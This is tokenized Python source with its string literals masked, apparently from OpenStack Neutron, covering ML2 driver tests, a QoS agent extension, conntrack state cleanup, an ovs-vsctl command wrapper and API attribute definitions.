self . _test_response ( context , '<STR_LIT>' , '<STR_LIT:port>' , mock_method ) <EOL> def test_delete_port_postcommit ( self ) : <EOL> context = mock . Mock ( current = { '<STR_LIT:id>' : fake_port_uuid } ) <EOL> resp = self . _mock_req_resp ( requests . codes . created ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> return_value = resp ) as mock_method : <EOL> self . delete_port_postcommit ( context ) <EOL> self . _test_response ( context , '<STR_LIT>' , '<STR_LIT:port>' , mock_method ) <EOL> valid_segment = { <EOL> api . ID : '<STR_LIT>' , <EOL> api . NETWORK_TYPE : constants . TYPE_LOCAL , <EOL> api . SEGMENTATION_ID : '<STR_LIT>' , <EOL> api . PHYSICAL_NETWORK : '<STR_LIT>' } <EOL> invalid_segment = { <EOL> api . ID : '<STR_LIT>' , <EOL> api . NETWORK_TYPE : constants . TYPE_NONE , <EOL> api . SEGMENTATION_ID : '<STR_LIT>' , <EOL> api . PHYSICAL_NETWORK : '<STR_LIT>' } <EOL> def test_check_segment ( self ) : <EOL> """<STR_LIT>""" <EOL> all_network_types = [ constants . TYPE_FLAT , constants . TYPE_GRE , <EOL> constants . TYPE_LOCAL , constants . TYPE_VXLAN , <EOL> constants . TYPE_VLAN , constants . TYPE_NONE ] <EOL> valid_types = { network_type <EOL> for network_type in all_network_types <EOL> if self . check_segment ( { api . NETWORK_TYPE : network_type } ) } <EOL> self . assertEqual ( { constants . TYPE_LOCAL , constants . TYPE_GRE , <EOL> constants . TYPE_VXLAN , constants . TYPE_VLAN } , <EOL> valid_types ) <EOL> def test_bind_port ( self ) : <EOL> self . vif_type = "<STR_LIT>" <EOL> self . vif_details = "<STR_LIT>" <EOL> network = mock . MagicMock ( spec = api . NetworkContext ) <EOL> port_context = mock . MagicMock ( <EOL> spec = ctx . PortContext , current = { '<STR_LIT:id>' : '<STR_LIT>' } , <EOL> segments_to_bind = [ self . valid_segment , self . invalid_segment ] , <EOL> network = network ) <EOL> self . bind_port ( port_context ) <EOL> port_context . set_binding . assert_called_once_with ( <EOL> self . valid_segment [ api . ID ] , self . vif_type , <EOL> self . vif_details , status = n_const . PORT_STATUS_ACTIVE ) </s>
<s> import abc <EOL> import collections <EOL> from neutron_lib import exceptions <EOL> from oslo_concurrency import lockutils <EOL> from oslo_log import log as logging <EOL> import six <EOL> from neutron . _i18n import _LW , _LI <EOL> from neutron . agent . l2 import agent_extension <EOL> from neutron . api . rpc . callbacks . consumer import registry <EOL> from neutron . api . rpc . callbacks import events <EOL> from neutron . api . rpc . callbacks import resources <EOL> from neutron . api . rpc . handlers import resources_rpc <EOL> from neutron import manager <EOL> LOG = logging . getLogger ( __name__ ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class QosAgentDriver ( object ) : <EOL> """<STR_LIT>""" <EOL> SUPPORTED_RULES = set ( ) <EOL> @ abc . abstractmethod <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> def create ( self , port , qos_policy ) : <EOL> """<STR_LIT>""" <EOL> self . _handle_update_create_rules ( '<STR_LIT>' , port , qos_policy ) <EOL> def consume_api ( self , agent_api ) : <EOL> """<STR_LIT>""" <EOL> def update ( self , port , qos_policy ) : <EOL> """<STR_LIT>""" <EOL> self . _handle_update_create_rules ( '<STR_LIT>' , port , qos_policy ) <EOL> def delete ( self , port , qos_policy = None ) : <EOL> """<STR_LIT>""" <EOL> if qos_policy is None : <EOL> rule_types = self . SUPPORTED_RULES <EOL> else : <EOL> rule_types = set ( <EOL> [ rule . rule_type <EOL> for rule in self . _iterate_rules ( qos_policy . rules ) ] ) <EOL> for rule_type in rule_types : <EOL> self . _handle_rule_delete ( port , rule_type ) <EOL> def _iterate_rules ( self , rules ) : <EOL> for rule in rules : <EOL> rule_type = rule . rule_type <EOL> if rule_type in self . SUPPORTED_RULES : <EOL> yield rule <EOL> else : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : rule . id , '<STR_LIT>' : rule_type } ) <EOL> def _handle_rule_delete ( self , port , rule_type ) : <EOL> handler_name = "<STR_LIT>" . join ( ( "<STR_LIT>" , rule_type ) ) <EOL> handler = getattr ( self , handler_name ) <EOL> handler ( port ) <EOL> def _handle_update_create_rules ( self , action , port , qos_policy ) : <EOL> for rule in self . _iterate_rules ( qos_policy . rules ) : <EOL> if rule . should_apply_to_port ( port ) : <EOL> handler_name = "<STR_LIT>" . join ( ( action , "<STR_LIT:_>" , rule . rule_type ) ) <EOL> handler = getattr ( self , handler_name ) <EOL> handler ( port , rule ) <EOL> else : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT:port>' : port , '<STR_LIT>' : rule . id } ) <EOL> class PortPolicyMap ( object ) : <EOL> def __init__ ( self ) : <EOL> self . qos_policy_ports = collections . defaultdict ( dict ) <EOL> self . known_policies = { } <EOL> self . port_policies = { } <EOL> def get_ports ( self , policy ) : <EOL> return self . qos_policy_ports [ policy . id ] . values ( ) <EOL> def get_policy ( self , policy_id ) : <EOL> return self . known_policies . get ( policy_id ) <EOL> def update_policy ( self , policy ) : <EOL> self . known_policies [ policy . id ] = policy <EOL> def has_policy_changed ( self , port , policy_id ) : <EOL> return self . port_policies . get ( port [ '<STR_LIT>' ] ) != policy_id <EOL> def get_port_policy ( self , port ) : <EOL> policy_id = self . port_policies . get ( port [ '<STR_LIT>' ] ) <EOL> if policy_id : <EOL> return self . get_policy ( policy_id ) <EOL> def set_port_policy ( self , port , policy ) : <EOL> """<STR_LIT>""" <EOL> port_id = port [ '<STR_LIT>' ] <EOL> old_policy = self . get_port_policy ( port ) <EOL> self . known_policies [ policy . id ] = policy <EOL> self . port_policies [ port_id ] = policy . id <EOL> self . qos_policy_ports [ policy . id ] [ port_id ] = port <EOL> if old_policy and old_policy . id != policy . id : <EOL> del self . qos_policy_ports [ old_policy . id ] [ port_id ] <EOL> return old_policy <EOL> def clean_by_port ( self , port ) : <EOL> """<STR_LIT>""" <EOL> port_id = port [ '<STR_LIT>' ] <EOL> if port_id in self . port_policies : <EOL> del self . port_policies [ port_id ] <EOL> for qos_policy_id , port_dict in self . qos_policy_ports . items ( ) : <EOL> if port_id in port_dict : <EOL> del port_dict [ port_id ] <EOL> if not port_dict : <EOL> self . _clean_policy_info ( qos_policy_id ) <EOL> return <EOL> raise exceptions . PortNotFound ( port_id = port [ '<STR_LIT>' ] ) <EOL> def _clean_policy_info ( self , qos_policy_id ) : <EOL> del self . qos_policy_ports [ qos_policy_id ] <EOL> del self . known_policies [ qos_policy_id ] <EOL> class QosAgentExtension ( agent_extension . AgentCoreResourceExtension ) : <EOL> SUPPORTED_RESOURCES = [ resources . QOS_POLICY ] <EOL> def initialize ( self , connection , driver_type ) : <EOL> """<STR_LIT>""" <EOL> self . resource_rpc = resources_rpc . ResourcesPullRpcApi ( ) <EOL> self . qos_driver = manager . NeutronManager . load_class_for_provider ( <EOL> '<STR_LIT>' , driver_type ) ( ) <EOL> self . qos_driver . consume_api ( self . agent_api ) <EOL> self . qos_driver . initialize ( ) <EOL> self . policy_map = PortPolicyMap ( ) <EOL> registry . subscribe ( self . _handle_notification , resources . QOS_POLICY ) <EOL> self . _register_rpc_consumers ( connection ) <EOL> def consume_api ( self , agent_api ) : <EOL> self . agent_api = agent_api <EOL> def _register_rpc_consumers ( self , connection ) : <EOL> endpoints = [ resources_rpc . ResourcesPushRpcCallback ( ) ] <EOL> for resource_type in self . SUPPORTED_RESOURCES : <EOL> topic = resources_rpc . resource_type_versioned_topic ( resource_type ) <EOL> connection . create_consumer ( topic , endpoints , fanout = True ) <EOL> @ lockutils . synchronized ( '<STR_LIT>' ) <EOL> def _handle_notification ( self , qos_policy , event_type ) : <EOL> if event_type == events . UPDATED : <EOL> self . _process_update_policy ( qos_policy ) <EOL> @ lockutils . synchronized ( '<STR_LIT>' ) <EOL> def handle_port ( self , context , port ) : <EOL> """<STR_LIT>""" <EOL> port_id = port [ '<STR_LIT>' ] <EOL> port_qos_policy_id = port . get ( '<STR_LIT>' ) <EOL> network_qos_policy_id = port . get ( '<STR_LIT>' ) <EOL> qos_policy_id = port_qos_policy_id or network_qos_policy_id <EOL> if qos_policy_id is None : <EOL> self . _process_reset_port ( port ) <EOL> return <EOL> if not self . policy_map . has_policy_changed ( port , qos_policy_id ) : <EOL> return <EOL> qos_policy = self . resource_rpc . pull ( <EOL> context , resources . QOS_POLICY , qos_policy_id ) <EOL> if qos_policy is None : <EOL> LOG . info ( _LI ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : qos_policy_id , '<STR_LIT>' : port_id } ) <EOL> self . _process_reset_port ( port ) <EOL> else : <EOL> old_qos_policy = self . policy_map . set_port_policy ( port , qos_policy ) <EOL> if old_qos_policy : <EOL> self . qos_driver . delete ( port , old_qos_policy ) <EOL> self . qos_driver . update ( port , qos_policy ) <EOL> else : <EOL> self . qos_driver . create ( port , qos_policy ) <EOL> def delete_port ( self , context , port ) : <EOL> self . _process_reset_port ( port ) <EOL> def _policy_rules_modified ( self , old_policy , policy ) : <EOL> return not ( len ( old_policy . rules ) == len ( policy . rules ) and <EOL> all ( i in old_policy . rules for i in policy . rules ) ) <EOL> def _process_update_policy ( self , qos_policy ) : <EOL> old_qos_policy = self . policy_map . get_policy ( qos_policy . id ) <EOL> if old_qos_policy : <EOL> if self . _policy_rules_modified ( old_qos_policy , qos_policy ) : <EOL> for port in self . policy_map . get_ports ( qos_policy ) : <EOL> self . qos_driver . delete ( port , old_qos_policy ) <EOL> self . qos_driver . update ( port , qos_policy ) <EOL> self . policy_map . update_policy ( qos_policy ) <EOL> def _process_reset_port ( self , port ) : <EOL> try : <EOL> self . policy_map . clean_by_port ( port ) <EOL> self . qos_driver . delete ( port ) <EOL> except exceptions . PortNotFound : <EOL> LOG . info ( _LI ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> port [ '<STR_LIT>' ] ) </s>
<s> import netaddr <EOL> from oslo_log import log as logging <EOL> from neutron . _i18n import _LE <EOL> from neutron . agent . linux import utils as linux_utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class IpConntrackManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , zone_lookup_func , execute = None , namespace = None ) : <EOL> self . get_device_zone = zone_lookup_func <EOL> self . execute = execute or linux_utils . execute <EOL> self . namespace = namespace <EOL> @ staticmethod <EOL> def _generate_conntrack_cmd_by_rule ( rule , namespace ) : <EOL> ethertype = rule . get ( '<STR_LIT>' ) <EOL> protocol = rule . get ( '<STR_LIT>' ) <EOL> direction = rule . get ( '<STR_LIT>' ) <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if protocol : <EOL> cmd . extend ( [ '<STR_LIT>' , str ( protocol ) ] ) <EOL> cmd . extend ( [ '<STR_LIT>' , str ( ethertype ) . lower ( ) ] ) <EOL> cmd . append ( '<STR_LIT>' if direction == '<STR_LIT>' else '<STR_LIT>' ) <EOL> cmd_ns = [ ] <EOL> if namespace : <EOL> cmd_ns . extend ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , namespace ] ) <EOL> cmd_ns . extend ( cmd ) <EOL> return cmd_ns <EOL> def _get_conntrack_cmds ( self , device_info_list , rule , remote_ip = None ) : <EOL> conntrack_cmds = set ( ) <EOL> cmd = self . _generate_conntrack_cmd_by_rule ( rule , self . namespace ) <EOL> ethertype = rule . get ( '<STR_LIT>' ) <EOL> for device_info in device_info_list : <EOL> zone_id = self . get_device_zone ( device_info [ '<STR_LIT>' ] ) <EOL> ips = device_info . get ( '<STR_LIT>' , [ ] ) <EOL> for ip in ips : <EOL> net = netaddr . IPNetwork ( ip ) <EOL> if str ( net . version ) not in ethertype : <EOL> continue <EOL> ip_cmd = [ str ( net . ip ) , '<STR_LIT>' , zone_id ] <EOL> if remote_ip and str ( <EOL> netaddr . IPNetwork ( remote_ip ) . version ) in ethertype : <EOL> ip_cmd . extend ( [ '<STR_LIT>' , str ( remote_ip ) ] ) <EOL> conntrack_cmds . add ( tuple ( cmd + ip_cmd ) ) <EOL> return conntrack_cmds <EOL> def _delete_conntrack_state ( self , device_info_list , rule , remote_ip = None ) : <EOL> conntrack_cmds = self . _get_conntrack_cmds ( device_info_list , <EOL> rule , remote_ip ) <EOL> for cmd in conntrack_cmds : <EOL> try : <EOL> self . execute ( list ( cmd ) , run_as_root = True , <EOL> check_exit_code = True , <EOL> extra_ok_codes = [ <NUM_LIT:1> ] ) <EOL> except RuntimeError : <EOL> LOG . exception ( <EOL> _LE ( "<STR_LIT>" ) , str ( cmd ) ) <EOL> def delete_conntrack_state_by_rule ( self , device_info_list , rule ) : <EOL> self . _delete_conntrack_state ( device_info_list , rule ) <EOL> def delete_conntrack_state_by_remote_ips ( self , device_info_list , <EOL> ethertype , remote_ips ) : <EOL> for direction in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> rule = { '<STR_LIT>' : str ( ethertype ) . lower ( ) , <EOL> '<STR_LIT>' : direction } <EOL> if remote_ips : <EOL> for remote_ip in remote_ips : <EOL> self . _delete_conntrack_state ( <EOL> device_info_list , rule , remote_ip ) <EOL> else : <EOL> self . _delete_conntrack_state ( device_info_list , rule ) </s>
<s> import collections <EOL> import itertools <EOL> from oslo_log import log as logging <EOL> from oslo_serialization import jsonutils <EOL> from oslo_utils import excutils <EOL> import six <EOL> from neutron . _i18n import _LE <EOL> from neutron . agent . common import utils <EOL> from neutron . agent . ovsdb import api as ovsdb <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class Transaction ( ovsdb . Transaction ) : <EOL> def __init__ ( self , context , check_error = False , log_errors = True , opts = None ) : <EOL> self . context = context <EOL> self . check_error = check_error <EOL> self . log_errors = log_errors <EOL> self . opts = [ "<STR_LIT>" % self . context . vsctl_timeout , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> if opts : <EOL> self . opts += opts <EOL> self . commands = [ ] <EOL> def add ( self , command ) : <EOL> self . commands . append ( command ) <EOL> return command <EOL> def commit ( self ) : <EOL> args = [ ] <EOL> for cmd in self . commands : <EOL> cmd . result = None <EOL> args += cmd . vsctl_args ( ) <EOL> res = self . run_vsctl ( args ) <EOL> if res is None : <EOL> return <EOL> res = res . replace ( r'<STR_LIT:\\>' , '<STR_LIT:\\>' ) . splitlines ( ) <EOL> for i , record in enumerate ( res ) : <EOL> self . commands [ i ] . result = record <EOL> return [ cmd . result for cmd in self . commands ] <EOL> def run_vsctl ( self , args ) : <EOL> full_args = [ "<STR_LIT>" ] + self . opts + args <EOL> try : <EOL> return utils . execute ( full_args , run_as_root = True , <EOL> log_fail_as_error = False ) . rstrip ( ) <EOL> except Exception as e : <EOL> with excutils . save_and_reraise_exception ( ) as ctxt : <EOL> if self . log_errors : <EOL> LOG . error ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : full_args , '<STR_LIT>' : e } ) <EOL> if not self . check_error : <EOL> ctxt . reraise = False <EOL> class BaseCommand ( ovsdb . Command ) : <EOL> def __init__ ( self , context , cmd , opts = None , args = None ) : <EOL> self . context = context <EOL> self . cmd = cmd <EOL> self . opts = [ ] if opts is None else opts <EOL> self . args = [ ] if args is None else args <EOL> def execute ( self , check_error = False , log_errors = True ) : <EOL> with Transaction ( self . context , check_error = check_error , <EOL> log_errors = log_errors ) as txn : <EOL> txn . add ( self ) <EOL> return self . result <EOL> def vsctl_args ( self ) : <EOL> return itertools . chain ( ( '<STR_LIT>' , ) , self . opts , ( self . cmd , ) , self . args ) <EOL> class MultiLineCommand ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def result ( self ) : <EOL> return self . _result <EOL> @ result . setter <EOL> def result ( self , raw_result ) : <EOL> self . _result = raw_result . split ( r'<STR_LIT:\n>' ) if raw_result else [ ] <EOL> class DbCommand ( BaseCommand ) : <EOL> def __init__ ( self , context , cmd , opts = None , args = None , columns = None ) : <EOL> if opts is None : <EOL> opts = [ ] <EOL> if columns : <EOL> opts += [ '<STR_LIT>' % "<STR_LIT:U+002C>" . join ( columns ) ] <EOL> super ( DbCommand , self ) . __init__ ( context , cmd , opts , args ) <EOL> @ property <EOL> def result ( self ) : <EOL> return self . _result <EOL> @ result . setter <EOL> def result ( self , raw_result ) : <EOL> if not raw_result : <EOL> self . _result = None <EOL> return <EOL> try : <EOL> json = jsonutils . loads ( raw_result ) <EOL> except ( ValueError , TypeError ) as e : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> LOG . error ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : raw_result , '<STR_LIT>' : e } ) <EOL> headings = json [ '<STR_LIT>' ] <EOL> data = json [ '<STR_LIT:data>' ] <EOL> results = [ ] <EOL> for record in data : <EOL> obj = { } <EOL> for pos , heading in enumerate ( headings ) : <EOL> obj [ heading ] = ovsdb . val_to_py ( record [ pos ] ) <EOL> results . append ( obj ) <EOL> self . _result = results <EOL> class DbGetCommand ( DbCommand ) : <EOL> @ DbCommand . result . setter <EOL> def result ( self , val ) : <EOL> DbCommand . result . fset ( self , val ) <EOL> if self . _result : <EOL> self . _result = list ( self . _result [ <NUM_LIT:0> ] . values ( ) ) [ <NUM_LIT:0> ] <EOL> class BrExistsCommand ( DbCommand ) : <EOL> @ DbCommand . result . setter <EOL> def result ( self , val ) : <EOL> self . _result = val is not None <EOL> def execute ( self ) : <EOL> return super ( BrExistsCommand , self ) . execute ( check_error = False , <EOL> log_errors = False ) <EOL> class OvsdbVsctl ( ovsdb . API ) : <EOL> def transaction ( self , check_error = False , log_errors = True , ** kwargs ) : <EOL> return Transaction ( self . context , check_error , log_errors , ** kwargs ) <EOL> def add_br ( self , name , may_exist = True , datapath_type = None ) : <EOL> opts = [ '<STR_LIT>' ] if may_exist else None <EOL> params = [ name ] <EOL> if datapath_type : <EOL> params += [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , name , <EOL> '<STR_LIT>' % datapath_type ] <EOL> return BaseCommand ( self . context , '<STR_LIT>' , opts , params ) <EOL> def del_br ( self , name , if_exists = True ) : <EOL> opts = [ '<STR_LIT>' ] if if_exists else None <EOL> return BaseCommand ( self . context , '<STR_LIT>' , opts , [ name ] ) <EOL> def br_exists ( self , name ) : <EOL> return BrExistsCommand ( self . context , '<STR_LIT:list>' , args = [ '<STR_LIT>' , name ] ) <EOL> def port_to_br ( self , name ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ name ] ) <EOL> def iface_to_br ( self , name ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ name ] ) <EOL> def list_br ( self ) : <EOL> return MultiLineCommand ( self . context , '<STR_LIT>' ) <EOL> def br_get_external_id ( self , name , field ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , <EOL> args = [ name , field ] ) <EOL> def db_create ( self , table , ** col_values ) : <EOL> args = [ table ] <EOL> args += _set_colval_args ( * col_values . items ( ) ) <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = args ) <EOL> def db_destroy ( self , table , record ) : <EOL> args = [ table , record ] <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = args ) <EOL> def db_set ( self , table , record , * col_values ) : <EOL> args = [ table , record ] <EOL> args += _set_colval_args ( * col_values ) <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = args ) <EOL> def db_clear ( self , table , record , column ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ table , record , <EOL> column ] ) <EOL> def db_get ( self , table , record , column ) : <EOL> return DbGetCommand ( self . context , '<STR_LIT:list>' , args = [ table , record ] , <EOL> columns = [ column ] ) <EOL> def db_list ( self , table , records = None , columns = None , if_exists = False ) : <EOL> opts = [ '<STR_LIT>' ] if if_exists else None <EOL> args = [ table ] <EOL> if records : <EOL> args += records <EOL> return DbCommand ( self . context , '<STR_LIT:list>' , opts = opts , args = args , <EOL> columns = columns ) <EOL> def db_find ( self , table , * conditions , ** kwargs ) : <EOL> columns = kwargs . pop ( '<STR_LIT>' , None ) <EOL> args = itertools . chain ( [ table ] , <EOL> * [ _set_colval_args ( c ) for c in conditions ] ) <EOL> return DbCommand ( self . context , '<STR_LIT>' , args = args , columns = columns ) <EOL> def set_controller ( self , bridge , controllers ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , <EOL> args = [ bridge ] + list ( controllers ) ) <EOL> def del_controller ( self , bridge ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ bridge ] ) <EOL> def get_controller ( self , bridge ) : <EOL> return MultiLineCommand ( self . context , '<STR_LIT>' , args = [ bridge ] ) <EOL> def set_fail_mode ( self , bridge , mode ) : <EOL> return BaseCommand ( self . context , '<STR_LIT>' , args = [ bridge , mode ] ) <EOL> def add_port ( self , bridge , port , may_exist = True ) : <EOL> opts = [ '<STR_LIT>' ] if may_exist else None <EOL> return BaseCommand ( self . context , '<STR_LIT>' , opts , [ bridge , port ] ) <EOL> def del_port ( self , port , bridge = None , if_exists = True ) : <EOL> opts = [ '<STR_LIT>' ] if if_exists else None <EOL> args = filter ( None , [ bridge , port ] ) <EOL> return BaseCommand ( self . context , '<STR_LIT>' , opts , args ) <EOL> def list_ports ( self , bridge ) : <EOL> return MultiLineCommand ( self . context , '<STR_LIT>' , args = [ bridge ] ) <EOL> def list_ifaces ( self , bridge ) : <EOL> return MultiLineCommand ( self . context , '<STR_LIT>' , args = [ bridge ] ) <EOL> def _set_colval_args ( * col_values ) : <EOL> args = [ ] <EOL> for entry in col_values : <EOL> if len ( entry ) == <NUM_LIT:2> : <EOL> col , op , val = entry [ <NUM_LIT:0> ] , '<STR_LIT:=>' , entry [ <NUM_LIT:1> ] <EOL> else : <EOL> col , op , val = entry <EOL> if isinstance ( val , collections . Mapping ) : <EOL> args += [ "<STR_LIT>" % ( <EOL> col , k , op , ovsdb . py_to_val ( v ) ) for k , v in val . items ( ) ] <EOL> elif ( isinstance ( val , collections . Sequence ) <EOL> and not isinstance ( val , six . string_types ) ) : <EOL> if len ( val ) == <NUM_LIT:0> : <EOL> args . append ( "<STR_LIT>" % ( col , op , "<STR_LIT>" ) ) <EOL> else : <EOL> args . append ( <EOL> "<STR_LIT>" % ( col , op , "<STR_LIT:U+002C>" . join ( map ( ovsdb . py_to_val , val ) ) ) ) <EOL> else : <EOL> args . append ( "<STR_LIT>" % ( col , op , ovsdb . py_to_val ( val ) ) ) <EOL> return args </s>
<s> import sys <EOL> from debtcollector import moves <EOL> from neutron_lib . api import converters as lib_converters <EOL> from neutron_lib . api import validators as lib_validators <EOL> from neutron_lib import constants <EOL> import six <EOL> import webob . exc <EOL> from neutron . _i18n import _ <EOL> from neutron . common import _deprecate <EOL> from neutron . common import constants as n_const <EOL> SHARED = '<STR_LIT>' <EOL> _deprecate . _DeprecateSubset . and_also ( '<STR_LIT>' , lib_validators ) <EOL> NAME_MAX_LEN = <NUM_LIT:255> <EOL> TENANT_ID_MAX_LEN = <NUM_LIT:255> <EOL> DESCRIPTION_MAX_LEN = <NUM_LIT:255> <EOL> LONG_DESCRIPTION_MAX_LEN = <NUM_LIT> <EOL> DEVICE_ID_MAX_LEN = <NUM_LIT:255> <EOL> DEVICE_OWNER_MAX_LEN = <NUM_LIT:255> <EOL> def _lib ( old_name ) : <EOL> """<STR_LIT>""" <EOL> new_func = getattr ( lib_validators , old_name , None ) <EOL> if not new_func : <EOL> new_func = getattr ( lib_validators , old_name [ <NUM_LIT:1> : ] , None ) <EOL> if not new_func : <EOL> new_func = getattr ( lib_converters , old_name , None ) <EOL> assert new_func <EOL> return moves . moved_function ( new_func , old_name , __name__ , <EOL> message = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , removal_version = '<STR_LIT>' ) <EOL> _verify_dict_keys = _lib ( '<STR_LIT>' ) <EOL> is_attr_set = _lib ( '<STR_LIT>' ) <EOL> _validate_list_of_items = _lib ( '<STR_LIT>' ) <EOL> _validate_values = _lib ( '<STR_LIT>' ) <EOL> _validate_not_empty_string_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_not_empty_string = _lib ( '<STR_LIT>' ) <EOL> _validate_string_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_string = _lib ( '<STR_LIT>' ) <EOL> validate_list_of_unique_strings = _lib ( '<STR_LIT>' ) <EOL> _validate_boolean = _lib ( '<STR_LIT>' ) <EOL> _validate_range = _lib ( '<STR_LIT>' ) <EOL> _validate_no_whitespace = _lib ( '<STR_LIT>' ) <EOL> _validate_mac_address = _lib ( '<STR_LIT>' ) <EOL> _validate_mac_address_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_ip_address = _lib ( '<STR_LIT>' ) <EOL> _validate_ip_pools = _lib ( '<STR_LIT>' ) <EOL> _validate_fixed_ips = _lib ( '<STR_LIT>' ) <EOL> _validate_nameservers = _lib ( '<STR_LIT>' ) <EOL> _validate_hostroutes = _lib ( '<STR_LIT>' ) <EOL> _validate_ip_address_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_subnet = _lib ( '<STR_LIT>' ) <EOL> _validate_subnet_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_subnet_list = _lib ( '<STR_LIT>' ) <EOL> _validate_regex = _lib ( '<STR_LIT>' ) <EOL> _validate_regex_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_subnetpool_id = _lib ( '<STR_LIT>' ) <EOL> _validate_subnetpool_id_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_uuid = _lib ( '<STR_LIT>' ) <EOL> _validate_uuid_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_uuid_list = _lib ( '<STR_LIT>' ) <EOL> _validate_dict_item = _lib ( '<STR_LIT>' ) <EOL> _validate_dict = _lib ( '<STR_LIT>' ) <EOL> _validate_dict_or_none = _lib ( '<STR_LIT>' ) <EOL> _validate_dict_or_empty = _lib ( '<STR_LIT>' ) <EOL> _validate_dict_or_nodata = _lib ( '<STR_LIT>' ) <EOL> _validate_non_negative = _lib ( '<STR_LIT>' ) <EOL> convert_to_boolean = _lib ( '<STR_LIT>' ) <EOL> convert_to_boolean_if_not_none = _lib ( '<STR_LIT>' ) <EOL> convert_to_int = _lib ( '<STR_LIT>' ) <EOL> convert_to_int_if_not_none = _lib ( '<STR_LIT>' ) <EOL> convert_to_positive_float_or_none = _lib ( '<STR_LIT>' ) <EOL> convert_kvp_str_to_list = _lib ( '<STR_LIT>' ) <EOL> convert_kvp_list_to_dict = _lib ( '<STR_LIT>' ) <EOL> convert_none_to_empty_list = _lib ( '<STR_LIT>' ) <EOL> convert_none_to_empty_dict = _lib ( '<STR_LIT>' ) <EOL> convert_to_list = _lib ( '<STR_LIT>' ) <EOL> _deprecate . _DeprecateSubset . and_also ( '<STR_LIT>' , lib_validators ) <EOL> _deprecate . _DeprecateSubset . and_also ( '<STR_LIT>' , lib_validators ) <EOL> NETWORK = '<STR_LIT>' <EOL> NETWORKS = '<STR_LIT>' % NETWORK <EOL> PORT = '<STR_LIT:port>' <EOL> PORTS = '<STR_LIT>' % PORT <EOL> SUBNET = '<STR_LIT>' <EOL> SUBNETS = '<STR_LIT>' % SUBNET <EOL> SUBNETPOOL = '<STR_LIT>' <EOL> SUBNETPOOLS = '<STR_LIT>' % SUBNETPOOL <EOL> RESOURCE_ATTRIBUTE_MAP = { <EOL> NETWORKS : { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:primary_key>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : NAME_MAX_LEN } , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT:default>' : [ ] , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : True , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT:status>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : TENANT_ID_MAX_LEN } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> SHARED : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : lib_converters . convert_to_boolean , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } , <EOL> } , <EOL> PORTS : { <EOL> '<STR_LIT:id>' : { '<STR_LIT>' : False , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:primary_key>' : True } , <EOL> '<STR_LIT:name>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : NAME_MAX_LEN } , <EOL> '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> 